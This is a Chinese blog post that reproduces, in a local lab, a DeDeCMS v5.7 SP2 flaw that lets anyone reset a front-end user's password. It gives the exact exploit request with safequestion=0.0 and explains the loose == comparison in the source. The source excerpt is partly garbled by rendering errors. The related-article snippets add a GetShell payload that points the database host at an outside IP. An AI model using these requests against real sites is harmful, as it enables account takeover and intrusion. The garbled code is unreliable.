DeDeCMS v5.7 SP2 前台任意用户密码修改漏洞复现

最新推荐文章于 2024-08-28 10:30:00 发布
最新推荐文章于 2024-08-28 10:30:00 发布
阅读量2.4k 收藏
点赞数 1
分类专栏: 实验 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wlllllianqing/article/details/121524273
版权

DeDeCMS v5.7 SP2 前台任意用户密码修改漏洞复现

一、漏洞概述

1.简介

织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。

2.漏洞限制

1、 只影响前台账户

2、 只能修改未设置安全问题的账户

3.影响版本

DeDeCMSV5.7SP2 正式版(2018-01-09)

二、环境搭建

1.下载DeDeCMS v5.7 SP2源码

在这里插入图片描述
实验环境:window 10

​ php5.6+mysql

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-m3aY5dD5-1637757098404)(C:/Users/16229/AppData/Roaming/Typora/typora-user-images/image-20211124171858593.png)]

三、复现过程

开启会员功能,注册一个一个账号且不要设置安全问题,因为这个漏洞的基础就是没有安全问题

在这里插入图片描述
在这里插入图片描述

另外还发现注册时不对电子邮箱进行检测
在这里插入图片描述

记住该用户uid=2

127.0.0.1/dedeCMS5.7/uploads/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2

直接使用bp抓包,可以得到key

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mpPuqXCn-1637757098412)(C:/Users/16229/AppData/Roaming/Typora/typora-user-images/image-20211124202500562.png)]

得到的key就是这里的临时验证码,输入即可直接修改密码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-T74Stnan-1637757098413)(C:/Users/16229/AppData/Roaming/Typora/typora-user-images/image-20211124202546456.png)][外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-R8R43Fah-1637757098414)(C:/Users/16229/AppData/Roaming/Typora/typora-user-images/image-20211124202700119.png)]

源码分析

else if($dopost == “safequestion”)

{
$mid = preg_replace("#[^0-9]#", “”, $id);

KaTeX parse error: Expected 'EOF', got '#' at position 57: …rid,email FROM #̲@__member WHERE…mid’";

$row = d b − > G e t O n e ( db->GetOne(db−>GetOne(sql);

if(empty($safequestion)) $safequestion = ‘’;

if(empty($safeanswer)) $safeanswer = ‘’;

if($row[‘safequestion’] == $safequestion && $row[‘safeanswer’] ==
$safeanswer)

{sn($mid, $row[‘userid’], $row[‘email’],N);exit();

}

else

{ShowMsg(“对不起,您的安全问题或答案回答错误”,"-1");exit();

}

}

#就是这里的判断出现了问题,因为使用了不够严谨的 == 进行了比较,导致if语句的条件为真,就会进入分支,进入sn函数

if($row[‘safequestion’] == $safequestion && $row[‘safeanswer’] ==
$safeanswer)

{
sn($mid, $row[‘userid’], $row[‘email’],N);

exit();

}

DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现
yghlqgt的博客
10-18 1125
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现 需要的用到的软件: phpstudy burpsuite 要完成该漏洞复现我们要完成如下几个步骤。 一、搭建网站 想要复现漏洞,首先需要搭建好环境,第一步就是要求我们搭建好这个有漏洞的网站, 首先下载好网页的代码:DeDeCMSV5.7SP2 正式版(2018-01-09) 然后要我们可以使用一些搭建网站的工具来搭建这个网站,我是用的工具是phpstudy,具体搭建步骤如下: 将下载DeDeCMSV5.7SP2 正式版(20
dedeCMS前台用户密码重置漏洞复现与分析
看不尽的尘埃——博客
11-19 599
版本:5.7 分析写在了后面 详细过程 安装     由于dede在安装完成后没开启会员注册,所以安装完成后首先进入后台,开启网站会员注册。  开启后,注册一个test账号,密码为123456。需要注意的是不要设置安全问题,才可以复现漏洞。  注册完成  进入后台查看test用户的mid值  ...
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改 漏洞复现(包括环境搭建)
aarong的博客
11-22 4601
目录一、漏洞概述二、环境搭建三、漏洞复现 一、漏洞概述 1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2 漏洞限制 ​ 1、 只影响前台账户 ​ 2、 只能修改
渗透实战:dedeCMS任意用户密码重置到内网getshell
xnxqwzy的博客
08-28 925
DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。通过信息泄露,攻击者可以获取到网站的用户用户名和一些敏感信息,然后通过利用任意密码重置漏洞,在不知道原密码的情况下,重置管理员账号的密码,从而获取管理员权限。接着,攻击者可以通过后台getshell,获取网站的控制权,进而进行各种恶意操作,如上传恶意文件、篡改网站内容、窃取用户信息等。
逻辑漏洞-任意密码重新设置
qq_58091216的博客
10-04 880
逻辑漏洞
dedecms v5.7越权漏洞复现
xxxMIng的博客
12-28 2049
环境搭建: 在win7x64上安装phpstudy 将网站源码 放置于C:\phpStudy\PHPTutorial\WWW\dedecms 并启动phpstudy 将运行模式放在系统服务上 应用 从物理机上访问该地址的index.php网页 进行下一步继续设定数据密码为root 管理员登陆 admin 密码 admin 点击继续即可完成搭站 ...
mysql5.5.57 漏洞_DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞
weixin_42118161的博客
02-18 914
入侵步骤如下:http://www.oday.pw/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GL...
DeDecms任意用户登录,管理员密码重置漏洞
鸥鹭忘机
07-28 4019
基本信息 漏洞编号:SSV-97087 实验版本:dedecms v5.7SP2 下载地址:http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz 参考文章:https://www.seebug.org/vuldb/ssvid-97074 前置知识 如果要把一个key存储到cookie中,织梦的存储方式是把key和加密key同时存储在cookie中。每次读取用户传来的key时,将key进行加密后与传来的加密k
dedeCMS解码
06-13 211
var str = 'arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1...
DedeCMS V5.7 SP2前台文件上传漏洞复现+审计+修复建议
ElsonHY的博客
11-21 2967
DedeCMS V5.7 SP2前台文件上传漏洞复现+审计+修复建议前言0x01 环境搭建0x02 复现过程重点开始0x03 源码审计0x04 修复建议 前言 CVE-2018-20129 2018-12-11 在CVE中文申请站公布了一个 DEDECMS 5.7 SP2 最新版本中存在文件上传漏洞,具有管理员权限者可利用该漏洞上传并getshell执行任意PHP代码。 经过分析验证。该漏洞要求管理员权限登录。并且要开启会员功能,这个功能在默认情况下是不开启,需要管理员手动开启。 经过360CERT判断
DeDeCMS 前台任意用户密码修改漏洞
zzzrrrppp的博客
11-21 2673
1 复现环境 PHP 5.6 DeDeCMSV5.7SP2 正式版(2018-01-09) 2 2 复现过程及结果 安装 DeDeCMS 利用PHPstudy安装环境 域名可以根据个人爱好填写。 域名/uploads/install/index.php进入安装页面。 密码在phpstudy查看 (可以保存下网址方便后续操作) 开启会员模式然后保存。 退出admin 注册一个没有安全问题的账号。 用admin账号可以看见test的账...
mysql5.5.57 漏洞_DedeCMS V5.7 SP2后台代码执行漏洞webshell
weixin_28953369的博客
02-18 445
漏洞详情织梦默认的后台地址是/dede/,当然也可以被更改,到时候根据网站具体情况替换默认后台地址即可。dede/tpl.php 中第251行到281行csrf_check();if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename)){ShowMsg('文件名不合法,不允许进行操作!', '-1');exit();}require_on...
DedeCMS之文件上传漏洞
Loooyoooxooo的博客
12-08 742
1、此版本的DedeCMS后台存在文件上传漏洞,在渗透过程中我们可以通过利用其它漏洞或者暴力破解的方式获取管理员账号和密码,并登录到后台进行此漏洞利用(此实验主要练习文件DedeCMS上传漏洞利用);6、依次点击 “生成” - “更新主页HTML” - “浏览选择新建的模板”,在"主页位置"输入框中将文件后缀修改为.php,首页模式选择"生成静态",并点击更新主页HTML。>换成一句话木马<?7、进入生成的链接,成功执行php代码,漏洞测试成功,在进行动态的输出框中,点击"浏览"
dedecms5.7 sp2前台修改任意用户密码漏洞复现
weixin_46801402的博客
07-29 950
DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 dedecms5.7 sp2允许用户修改任意前台用户密码,不能对管理员账户造成影响,毕竟管理员账户与前台用户的数据表时分开存放的。而且,前台也不能直接登录管理员账户...
Dedecms5.7漏洞利用
qq_48732306的博客
11-07 1312
Dedecms5.7渗透测试 Dedecms5.7由于编程的问题,有一个可以直接篡改用户密码漏洞,一下是复现过程: 一:启动环境: 首先要进行dedecms的安装,其下载地址为:] DeDeCMS 官网 http://www.dedecms.com/ [2]。 不过要安装dedecms还要搭建好服务器,而我选择的是使用warmpserve来搭建的,这个软件包含了apache2,php与mysql数据库,安装了就可以一键运行服务器。 Dedecms的安装包含了两个文件,把uploads那个文件放在warms
织梦漏洞复现
m0_60429594的博客
12-13 1993
1、影响版本 DeDeCMSV5.7SP2 正式版(2018-01-09)DeDeCMS 前台任意用户密码修改漏洞 2、复现环境 PHP 5.6 DeDeCMSV5.7SP2 正式版(2018-01-09) 2 复现过程及结果 ①建立好网站,安装好DeDeCMS并注册好一个账号 ②查看好MID,test的mid=2 ③利用抓包软件抓到key ④key就是临时验证码,利用临时验证码即可修改密码复现完成 ...
织梦dedecmsDedeCMS-V5.7-GBK-SP2前台文件上传漏洞复现
最新发布
11-06
织梦DEDECMS V5.7 GBK SP2版本的前台文件上传漏洞通常指的是站点允许用户通过提交恶意文件请求,绕过安全检查,将文件上传到服务器上,这可能导致权限提升、数据泄露或注入攻击。复现这种漏洞的一般步骤包括: 1. *...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值